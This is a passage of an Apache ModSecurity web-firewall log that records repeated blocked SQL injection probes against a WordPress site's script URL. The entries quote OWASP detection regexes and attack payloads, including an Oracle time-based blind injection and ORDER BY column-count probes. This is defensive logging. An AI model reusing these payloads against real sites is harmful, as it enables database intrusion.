"(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: AND 1229=DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(71)||CHR(101)||CHR(69),5)-- RNQP"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMuUusHEVNaz1QkYN6cwAAAM8"] [Sun Aug 18 00:55:06.588217 2024] [:error] [pid 26175:tid 140111182804736] [client 92.51.2.78:60824] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: ) ORDER BY 1-- tdGE"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMukusHEVNaz1QkYN6dAAAAME"] [Sun Aug 18 00:55:07.548089 2024] [:error] [pid 26175:tid 140111085823744] [client 92.51.2.78:60832] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMu0usHEVNaz1QkYN6dQAAAMQ"] [Sun Aug 18 00:55:08.053082 2024] [:error] [pid 26175:tid 140110959933184] [client 92.51.2.78:60834] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMvEusHEVNaz1QkYN6dgAAANM"] [Sun Aug 18 00:55:08.639366 2024] [:error] [pid 26175:tid 140111077431040] [client 92.51.2.78:60836] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMvEusHEVNaz1QkYN6dwAAAMU"] [Sun Aug 18 00:55:09.401700 2024] [:error] [pid 25549:tid 140110993504000] [client 92.51.2.78:60838] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMvZVyS4wZaDPTA77mQwAAAA8"] [Sun Aug 18 00:55:09.880722 2024] [:error] [pid 26175:tid 140111001896704] [client 92.51.2.78:60842] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMvUusHEVNaz1QkYN6eQAAAM4"] [Sun Aug 18 00:55:10.567944 2024] [:error] [pid 26175:tid 140111052252928] [client 92.51.2.78:60844] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMvkusHEVNaz1QkYN6egAAAMg"] [Sun Aug 18 00:55:11.335649 2024] [:error] [pid 26175:tid 140110943147776] [client 92.51.2.78:60846] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMv0usHEVNaz1QkYN6ewAAANU"] [Sun Aug 18 00:55:11.977912 2024] [:error] [pid 25551:tid 140111085823744] [client 92.51.2.78:60848] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMvySCXpUXSc3dPnIU-wAAAIQ"] [Sun Aug 18 00:55:12.759477 2024] [:error] [pid 25551:tid 140110934755072] [client 92.51.2.78:60850] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMwCSCXpUXSc3dPnIU_AAAAJY"] [Sun Aug 18 00:55:13.241334 2024] [:error] [pid 25551:tid 140110976718592] [client 92.51.2.78:60852] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMwSSCXpUXSc3dPnIU_QAAAJE"] [Sun Aug 18 00:55:14.015485 2024] [:error] [pid 25551:tid 140111035467520] [client 92.51.2.78:60854] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: ORDER BY 1-- WGFk"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMwiSCXpUXSc3dPnIU_gAAAIo"] [Sun Aug 18 00:55:14.482873 2024] [:error] [pid 25549:tid 140111077431040] [client 92.51.2.78:60856] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMwpVyS4wZaDPTA77mRAAAAAU"] [Sun Aug 18 00:55:14.931820 2024] [:error] [pid 25551:tid 140110943147776] [client 92.51.2.78:60858] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMwiSCXpUXSc3dPnIU_wAAAJU"] [Sun Aug 18 00:55:15.604138 2024] [:error] [pid 25551:tid 140111001896704] [client 92.51.2.78:60860] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMwySCXpUXSc3dPnIVAAAAAI4"] [Sun Aug 18 00:55:16.199042 2024] [:error] [pid 25551:tid 140110968325888] [client 92.51.2.78:60862] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMxCSCXpUXSc3dPnIVAQAAAJI"] [Sun Aug 18 00:55:16.921606 2024] [:error] [pid 26175:tid 140110917969664] [client 92.51.2.78:60864] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMxEusHEVNaz1QkYN6fAAAANg"] [Sun Aug 18 00:55:17.525457 2024] [:error] [pid 26175:tid 140110951540480] [client 92.51.2.78:60866] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMxUusHEVNaz1QkYN6fQAAANQ"] [Sun Aug 18 00:55:18.253273 2024] [:error] [pid 26175:tid 140111027074816] [client 92.51.2.78:60868] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMxkusHEVNaz1QkYN6fgAAAMs"] [Sun Aug 18 00:55:18.831980 2024] [:error] [pid 25551:tid 140111191197440] [client 92.51.2.78:60870] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMxiSCXpUXSc3dPnIVAgAAAIA"] [Sun Aug 18 00:55:19.377893 2024] [:error] [pid 25550:tid 140111018682112] [client 92.51.2.78:60872] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMx_n89YewL24c7_QPxQAAAEw"] [Sun Aug 18 00:55:20.091745 2024] [:error] [pid 25550:tid 140111052252928] [client 92.51.2.78:60874] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMyPn89YewL24c7_QPxgAAAEg"] [Sun Aug 18 00:55:20.659218 2024] [:error] [pid 25549:tid 140111060645632] [client 92.51.2.78:60876] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: ') ORDER BY 1-- ESNk"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMyJVyS4wZaDPTA77mRQAAAAc"] [Sun Aug 18 00:55:21.432394 2024] [:error] [pid 26175:tid 140110934755072] [client 92.51.2.78:60878] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMyUusHEVNaz1QkYN6fwAAANY"] [Sun Aug 18 00:55:22.016447 2024] [:error] [pid 25549:tid 140111018682112] [client 92.51.2.78:60880] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMypVyS4wZaDPTA77mRgAAAAw"] [Sun Aug 18 00:55:22.534009 2024] [:error] [pid 25549:tid 140111182804736] [client 92.51.2.78:60882] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMypVyS4wZaDPTA77mRwAAAAE"] [Sun Aug 18 00:55:23.021796 2024] [:error] [pid 25551:tid 140111182804736] [client 92.51.2.78:60884] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMyySCXpUXSc3dPnIVAwAAAIE"] [Sun Aug 18 00:55:23.765241 2024] [:error] [pid 25549:tid 140111010289408] [client 92.51.2.78:60886] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMy5VyS4wZaDPTA77mSAAAAA0"] [Sun Aug 18 00:55:24.479999 2024] [:error] [pid 25549:tid 140111094216448] [client 92.51.2.78:60888] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag 